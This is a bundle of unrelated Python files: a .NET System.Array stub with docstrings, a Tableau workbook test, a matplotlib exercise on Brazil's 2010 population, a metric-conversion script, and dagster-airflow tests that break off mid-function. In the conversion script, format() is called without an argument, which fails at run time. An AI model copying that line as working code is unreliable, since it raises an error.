lowerBounds: A one-dimensional array that contains the lower bound (starting index) of each
dimension of the System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length and lower bound for each dimension.
CreateInstance(elementType: Type,length: int) -> Array
Creates a one-dimensional System.Array of the specified System.Type and length,
with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length: The size of the System.Array to create.
Returns: A new one-dimensional System.Array of the specified System.Type with the
specified length,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int) -> Array
Creates a two-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
Returns: A new two-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int,length3: int) -> Array
Creates a three-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
length3: The size of the third dimension of the System.Array to create.
Returns: A new three-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
"""
pass
@staticmethod
def Empty():
""" Empty[T]() -> Array[T] """
pass
@staticmethod
def Exists(array,match):
""" Exists[T](array: Array[T],match: Predicate[T]) -> bool """
pass
@staticmethod
def Find(array,match):
""" Find[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindAll(array,match):
""" FindAll[T](array: Array[T],match: Predicate[T]) -> Array[T] """
pass
@staticmethod
def FindIndex(array,*__args):
"""
FindIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def FindLast(array,match):
""" FindLast[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindLastIndex(array,*__args):
"""
FindLastIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def ForEach(array,action):
""" ForEach[T](array: Array[T],action: Action[T]) """
pass
def GetEnumerator(self):
"""
GetEnumerator(self: Array) -> IEnumerator
Returns an System.Collections.IEnumerator for the System.Array.
Returns: An System.Collections.IEnumerator for the System.Array.
"""
pass
def GetLength(self,dimension):
"""
GetLength(self: Array,dimension: int) -> int
Gets a 32-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 32-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLongLength(self,dimension):
"""
GetLongLength(self: Array,dimension: int) -> Int64
Gets a 64-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 64-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLowerBound(self,dimension):
"""
GetLowerBound(self: Array,dimension: int) -> int
Gets the lower bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose lower bound needs to be
determined.
Returns: The lower bound of the specified dimension in the System.Array.
"""
pass
def GetUpperBound(self,dimension):
"""
GetUpperBound(self: Array,dimension: int) -> int
Gets the upper bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose upper bound needs to be
determined.
Returns: The upper bound of the specified dimension in the System.Array.
"""
pass
def GetValue(self,*__args):
"""
GetValue(self: Array,index1: Int64,index2: Int64) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
GetValue(self: Array,index: Int64) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 64-bit integer.
index: A 64-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[Int64]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 64-bit integers.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: Int64,index2: Int64,index3: Int64) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index: int) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 32-bit integer.
index: A 32-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[int]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 32-bit integers.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: int,index2: int,index3: int) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index1: int,index2: int) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
"""
pass
@staticmethod
def IndexOf(array,value,startIndex=None,count=None):
"""
IndexOf[T](array: Array[T],value: T) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
IndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the first occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the first occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that extends
from the specified index to the last element.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
Returns: The index of the first occurrence of value within the range of elements in
array that extends from startIndex to the last element,if found; otherwise,
the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that starts at
the specified index and contains the specified number of elements.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
count: The number of elements in the section to search.
Returns: The index of the first occurrence of value within the range of elements in
array that starts at startIndex and contains the number of elements specified
in count,if found; otherwise,the lower bound of the array minus 1.
"""
pass
def Initialize(self):
"""
Initialize(self: Array)
Initializes every element of the value-type System.Array by calling the default
constructor of the value type.
"""
pass
@staticmethod
def LastIndexOf(array,value,startIndex=None,count=None):
"""
LastIndexOf[T](array: Array[T],value: T) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
LastIndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the last occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the last occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that extends
from the first element to the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
Returns: The index of the last occurrence of value within the range of elements in array
that extends from the first element to startIndex,if found; otherwise,the
lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that contains
the specified number of elements and ends at the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
count: The number of elements in the section to search.
Returns: The index of the last occurrence of value within the range of elements in array
that contains the number of elements specified in count and ends at startIndex,
if found; otherwise,the lower bound of the array minus 1.
"""
pass
@staticmethod
def Resize(array,newSize):
""" Resize[T](array: Array[T],newSize: int) -> Array[T] """
pass
@staticmethod
def Reverse(array,index=None,length=None):
"""
Reverse(array: Array,index: int,length: int)
Reverses the sequence of the elements in a range of elements in the
one-dimensional System.Array.
array: The one-dimensional System.Array to reverse.
index: The starting index of the section to reverse.
length: The number of elements in the section to reverse.
Reverse(array: Array)
Reverses the sequence of the elements in the entire one-dimensional
System.Array.
array: The one-dimensional System.Array to reverse.
"""
pass
def SetValue(self,value,*__args):
"""
SetValue(self: Array,value: object,index1: Int64,index2: Int64)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: Int64)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 64-bit integer.
value: The new value for the specified element.
index: A 64-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[Int64])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 64-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: Int64,index2: Int64,index3: Int64)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index1: int,index2: int)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: int)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 32-bit integer.
value: The new value for the specified element.
index: A 32-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[int])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 32-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: int,index2: int,index3: int)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to set.
"""
pass
@staticmethod
def Sort(*__args):
"""
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int)Sort[T](array: Array[T],comparer: IComparer[T])Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue])Sort[T](array: Array[T],index: int,length: int)Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int,comparer: IComparer[TKey])Sort[T](array: Array[T],comparison: Comparison[T])Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],comparer: IComparer[TKey])Sort[T](array: Array[T],index: int,length: int,comparer: IComparer[T])Sort[T](array: Array[T])Sort(array: Array,index: int,length: int)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the System.IComparable implementation of each element of the
System.Array.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(keys: Array,items: Array,index: int,length: int)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the System.IComparable implementation
of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(array: Array)
Sorts the elements in an entire one-dimensional System.Array using the
System.IComparable implementation of each element of the System.Array.
array: The one-dimensional System.Array to sort.
Sort(keys: Array,items: Array)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the System.IComparable implementation of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
Sort(array: Array,index: int,length: int,comparer: IComparer)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the specified System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,index: int,length: int,comparer: IComparer)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the specified
System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(array: Array,comparer: IComparer)
Sorts the elements in a one-dimensional System.Array using the specified
System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,comparer: IComparer)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the specified System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
"""
pass
@staticmethod
def TrueForAll(array,match):
""" TrueForAll[T](array: Array[T],match: Predicate[T]) -> bool """
pass
def __add__(self,*args):
""" x.__add__(y) <==> x+y """
pass
def __contains__(self,*args):
"""
__contains__(self: IList,value: object) -> bool
Determines whether the System.Collections.IList contains a specific value.
value: The object to locate in the System.Collections.IList.
Returns: true if the System.Object is found in the System.Collections.IList; otherwise,
false.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __hash__(self,*args):
""" x.__hash__() <==> hash(x) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __len__(self,*args):
""" x.__len__() <==> len(x) """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __mul__(self,*args):
""" x.__mul__(y) <==> x*y """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(pythonType: type,items: object) -> object
__new__(pythonType: type,items: ICollection) -> object
"""
pass
def __ne__(self,*args):
pass
def __radd__(self,*args):
""" __radd__(data1: Array,data2: Array) -> Array """
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: Array) -> str """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]=x.__setitem__(i,y) <==> x[i]=x.__setitem__(i,y) <==> x[i]= """
pass
IsFixedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array has a fixed size.
Get: IsFixedSize(self: Array) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array is read-only.
Get: IsReadOnly(self: Array) -> bool
"""
IsSynchronized=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether access to the System.Array is synchronized (thread safe).
Get: IsSynchronized(self: Array) -> bool
"""
Length=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 32-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: Length(self: Array) -> int
"""
LongLength=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 64-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: LongLength(self: Array) -> Int64
"""
Rank=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the rank (number of dimensions) of the System.Array.
Get: Rank(self: Array) -> int
"""
SyncRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object that can be used to synchronize access to the System.Array.
Get: SyncRoot(self: Array) -> object
"""
|
import os.path
import unittest
import hashlib
from tableaudocumentapi import Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
TEST_TWB_FILE = os.path.join(
TEST_ASSET_DIR,
'group_test.twb'
)
TEST_TWB_FILE2 = os.path.join(
TEST_ASSET_DIR,
'add_user_filter_test.twb'
)
ACCESS_PERMISSIONS = os.path.join(
TEST_ASSET_DIR,
'access_permissions.csv'
)
class WorksheetTWB(unittest.TestCase):
def test_worksheet(self):
self.wb = Workbook(TEST_TWB_FILE)
self.worksheets = self.wb.worksheets
self.assertEqual('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.worksheets[0].datasources[0]['name'])
self.assertTrue(self.worksheets[0].slices.has_user_filter())
def test_adding_column_to_slices(self):
print("test_adding_column_to_slices")
with open(ACCESS_PERMISSIONS) as f:
self.csv2 = f.read()
self.wb2 = Workbook(TEST_TWB_FILE2)
self.assertEqual(2,len(self.wb2.worksheets))
self.assertEqual('Sheet 1', self.wb2.worksheets[0].name)
self.assertEqual('[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[none:Advertiser:nk]', self.wb2.worksheets[0].slices.columns[0])
self.assertFalse(self.wb2.worksheets[0].slices.has_user_filter())
self.wb2.ingest_access_permissions('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.csv2)
self.assertEqual("[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[User Filter 1]",self.wb2.worksheets[0].slices.columns[0])
self.assertTrue("has", self.wb2.worksheets[0].slices.has_user_filter())
|
# -*- coding: utf-8 -*-
# Lista de exercicio 06
# Exercicio 4
# importando as bibliotecas
import matplotlib as plt
import matplotlib.pyplot as plt
import numpy as np
# informacoes da tabela relativas aos dados masculino e feminino (IBGE)
idade = np.array(
["0 a 4 anos", "5 a 9 anos", "10 a 14 anos", "15 a 19 anos", "20 a 24 anos", "25 a 29 anos",
"30 a 34 anos", "35 a 39 anos", "40 a 44 anos", "45 a 49 anos", "50 a 54 anos", "55 a 59 anos",
"60 a 64 anos", "65 a 69 anos", "70 a 74 anos", "75 a 79 anos", "80 a 84 anos", "85 a 89 anos",
"90 a 94 anos", "95 a 99 anos", "100 anos e mais"])
feminino = np.array([6779171, 7345231, 8441348, 8432004, 8614963, 8643419, 8026854, 7121915, 6688796, 6141338, 5305407,
4373877, 3468085, 2616745, 2074264, 1472930, 998349, 508724, 211594, 66806, 16989])
masculino = np.array([7016987, 7624144, 8725413, 8558868, 8630229, 8460995, 7717658, 6766664, 6320568, 5692014, 4834995,
3902344, 3041035, 2224065, 1667372, 1090517, 668623, 310759, 114964, 31529, 7247])
pop = [x for x in range( len(idade) ) ]
# Configuracao do grafico
plt.figure(figsize=(10, 8))
plt.suptitle('Distribuição da População por sexo segundo os grupos de idade – Brasil – 2010', fontsize=18)
plt.rc('axes.spines', **{'bottom': True, 'left': False, 'right': False, 'top': False}) # remove as linhas da figura
# Subplot masculino
plt.subplot(221)
plt.barh(idade, masculino, align='center', color='blue', linewidth=0.5, label='Masculino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["", "", "4000000"])
plt.legend(loc='upper left') # legenda
plt.subplots_adjust(left=0.15, wspace=0.4) # coloca espaco entre os graficos
plt.gca().invert_xaxis() # inverte
plt.yticks([]) # remove o eixo y
# colocando linhas
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.20)
# subplot feminino
plt.subplot(222)
plt.barh(idade, feminino, align='center', color='orange', linewidth=0.5, label='Feminino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["0", "", "4000000"], )
plt.legend(loc='upper right') # legenda
# colocando linhas
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.30)
plt.show();
|
metros = int(input("uma distância em metro: "))
print("A medida de {}m corresponde a".format())
print("{}km".format(metros/1000))
print("{}hm".format(metros/100))
print("{}dam".format(metros/10))
print("{}dm".format(metros*10))
print("{}cm".format(metros*100))
print("{}mm".format(metros*1000))
|
from __future__ import unicode_literals
import os
import uuid
from airflow.exceptions import AirflowSkipException
from dagster_airflow.factory import AIRFLOW_MAX_DAG_NAME_LEN, _rename_for_airflow
from dagster_airflow.test_fixtures import ( # pylint: disable=unused-import
dagster_airflow_docker_operator_pipeline,
dagster_airflow_k8s_operator_pipeline,
dagster_airflow_python_operator_pipeline,
)
from dagster_airflow_tests.conftest import IMAGE
from dagster_airflow_tests.marks import nettest
from dagster import ExecutionTargetHandle
from dagster.core.events.log import DagsterEventRecord
from dagster.utils import script_relative_path
AIRFLOW_DEMO_EVENTS = {
('ENGINE_EVENT', None),
('STEP_START', 'multiply_the_word.compute'),
('STEP_INPUT', 'multiply_the_word.compute'),
('STEP_OUTPUT', 'multiply_the_word.compute'),
('OBJECT_STORE_OPERATION', 'multiply_the_word.compute'),
('STEP_SUCCESS', 'multiply_the_word.compute'),
('STEP_START', 'count_letters.compute'),
('OBJECT_STORE_OPERATION', 'count_letters.compute'),
('STEP_INPUT', 'count_letters.compute'),
('STEP_OUTPUT', 'count_letters.compute'),
('STEP_SUCCESS', 'count_letters.compute'),
}
ENVIRONMENTS_PATH = script_relative_path(
os.path.join(
'..',
'..',
'..',
'.buildkite',
'images',
'docker',
'test_project',
'test_pipelines',
'environments',
)
)
def validate_pipeline_execution(pipeline_exc_result):
seen_events = set()
for result in pipeline_exc_result.values():
for event in result:
if isinstance(event, DagsterEventRecord):
seen_events.add((event.dagster_event.event_type_value, event.step_key))
else:
seen_events.add((event.event_type_value, event.step_key))
assert seen_events == AIRFLOW_DEMO_EVENTS
class TestExecuteDagPythonFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagKubernetizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
class TestExecuteDagKubernetizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
def test_rename_for_airflow():
pairs = [
('foo', 'foo'),
('this-is-valid', 'this-is-valid'),
(
'a' * AIRFLOW_MAX_DAG_NAME_LEN + 'very long strings are disallowed',
'a' * AIRFLOW_MAX_DAG_NAME_LEN,
),
('a name with illegal spaces', 'a_name_with_illegal_spaces'),
('a#name$with@special*chars!!!', 'a_name_with_special_chars___'),
]
for before, after in pairs:
assert after == _rename_for_airflow(before)
def validate_skip_pipeline_execution(result):
expected_airflow_task_states = {
('foo', False),
('first_consumer', False),
('second_consumer', True),
